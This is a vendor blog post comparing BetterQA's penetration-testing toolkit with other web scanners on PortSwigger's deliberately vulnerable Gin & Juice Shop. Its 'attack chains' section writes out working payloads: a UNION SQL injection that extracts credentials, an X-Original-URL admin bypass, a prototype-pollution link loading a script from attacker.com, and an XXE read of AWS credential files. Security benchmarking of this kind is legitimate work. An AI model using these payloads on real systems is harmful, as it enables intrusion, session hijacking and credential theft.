Automated penetration testing: how BetterQA compares to everyone
Escape benchmarked themselves against legacy DAST. We benchmarked ourselves against everyone - including Escape, Burp Suite Professional, Qualys, ZAP, and Intruder. Here's what we found.
Gin & Juice Shop is PortSwigger's official benchmark application - a deliberately vulnerable web store used by security professionals worldwide to test and compare scanning tools. Escape recently published a benchmark comparing DAST scanners against it.
We ran BetterQA's Security Toolkit against the same target. The results reveal a fundamental difference between "vulnerability detection" and "penetration testing."
TL;DR: We found 27 vulnerabilities, constructed 6 attack chains proving real-world impact, and extracted actual credentials (carlos:hunter2) while other scanners just reported "SQL injection detected."
The numbers
Head-to-head comparison
| Metric | BetterQA V4 | Escape | Qualys | ZAP | Intruder | Burp Pro |
|---|---|---|---|---|---|---|
| Duration | ~90 min | 1h 37m | 1h 1m | 1h 31m | 7h 43m | ~20 min |
| Requests | ~8,000 | 7,630 | 82,536 | 15,164 | 73,549 | ~2,000 |
| Findings | 27 | 8 | 79 (FPs) | 5 | ~0 | 40 |
| Attack chains | 6 | 0 | 0 | 0 | 0 | 0 |
| False positives | 0 | 2 | Many | - | - | Low |
Vulnerability detection matrix
| Vulnerability | BetterQA | Escape | Qualys | ZAP | Burp |
|---|---|---|---|---|---|
| SQL injection | ✔ + creds | ✔ | ✔ | ✔ | ✔ |
| Prototype pollution to XSS | ✔ | ✔ | ✘ | ✘ | ✔ |
| XXE file read | ✔ | ✔ | ? | ✘ | ✔ |
| AngularJS CSTI | ✔ + RCE | ✔ | ? | ✘ | ✔ |
| Admin bypass (X-Original-URL) | ✔ | ✘ | ✘ | ✘ | ✘ |
| Passwordless auth | ✔ | ✘ | ✘ | ✘ | ✘ |
| Account lockout bypass | ✔ | ✘ | ✘ | ✘ | ✘ |
| DOM clobbering | ✔ | ✘ | ✘ | ✘ | ✘ |
The real difference: attack chains
Every scanner found SQL injection. But what does that actually mean for the business?
Traditional DAST
"SQL injection vulnerability detected at /catalog?category= parameter. Severity: High."
Output
"SQL injection exploited via UNION query. Extracted credentials: carlos:hunter2. Logged in as victim. Bypassed admin panel via X-Original-URL. Full admin access achieved."
We don't just detect. We prove impact.
Chain 1: database breach to admin takeover
# Extract credentials via UNION injection
curl 'https://target.shop/catalog?category=%27%20UNION%20SELECT%20NULL,NULL,username||%27:%27||password,NULL,NULL,NULL,NULL,NULL%20FROM%20users--'
# Response: carlos:hunter2
# Access admin panel via header bypass
curl 'https://target.shop/' -H 'X-Original-URL: /admin' -b 'session=...'Chain 2: prototype pollution to session hijack
# Malicious link that hijacks any user's session
https://target.shop/blog?__proto__[transport_url]=https://attacker.com/steal.js
# Vulnerable code (searchLogger.js):
if(config.transport_url) {
let script = document.createElement('script');
script.src = config.transport_url; // Attacker-controlled
document.body.appendChild(script);
}Chain 3: XXE to cloud credentials
curl -X POST 'https://target.shop/catalog/product/stock' \
-H 'Content-Type: application/xml' \
-d '<?xml version="1.0"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "file:///home/user/.aws/credentials">
]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>'Findings no other scanner detected
Admin panel bypass via X-Original-URL
Direct access to /admin returns 401. Adding X-Original-URL: /admin header bypasses access control. Any authenticated user can delete other users.
Account lockout bypass
No lockout after 20+ failed login attempts with valid CSRF tokens. Enables brute force attacks.
Passwordless authentication
Login form accepts username only. No password required. Account compromise requires only knowing a username.
Coverage transparency
Escape claims 93% coverage. Qualys claims 27%. Coverage of what? We measure against the OWASP WSTG v4.2:
We also document 15 gaps (what we didn't test) and 7 negative tests (what's confirmed NOT vulnerable).
Efficiency: signal vs. noise
| Scanner | Requests | Findings | Requests/finding |
|---|---|---|---|
| BetterQA | ~8,000 | 27 | 296 |
| Escape | 7,630 | 8 | 954 |
| ZAP | 15,164 | 5 | 3,033 |
| Qualys | 82,536 | 79 (FPs) | 1,044 |
3x more efficient than Escape. 10x more efficient than ZAP.
Conclusion
Escape asked: "How does our scanner compare to legacy DAST tools?"
We asked: "How does everyone compare when you actually try to break in?"
Traditional scanners optimize for detection. BetterQA optimizes for proof of impact. The difference between "High severity SQL injection detected" and "Extracted carlos:hunter2, gained admin access" is the difference between a vulnerability report and a penetration test.
Ready to see what an attacker would actually find?
Try BetterQA's Security Toolkit on your own application.
Methodology
Target: Gin & Juice Shop (PortSwigger's official security benchmark)
Authentication: carlos:hunter2
Scan type: V4 Maximum Coverage (multi-agent + cross-pollination)
Date: February 2026
Comparison data from Escape's benchmark. Burp results from internal testing.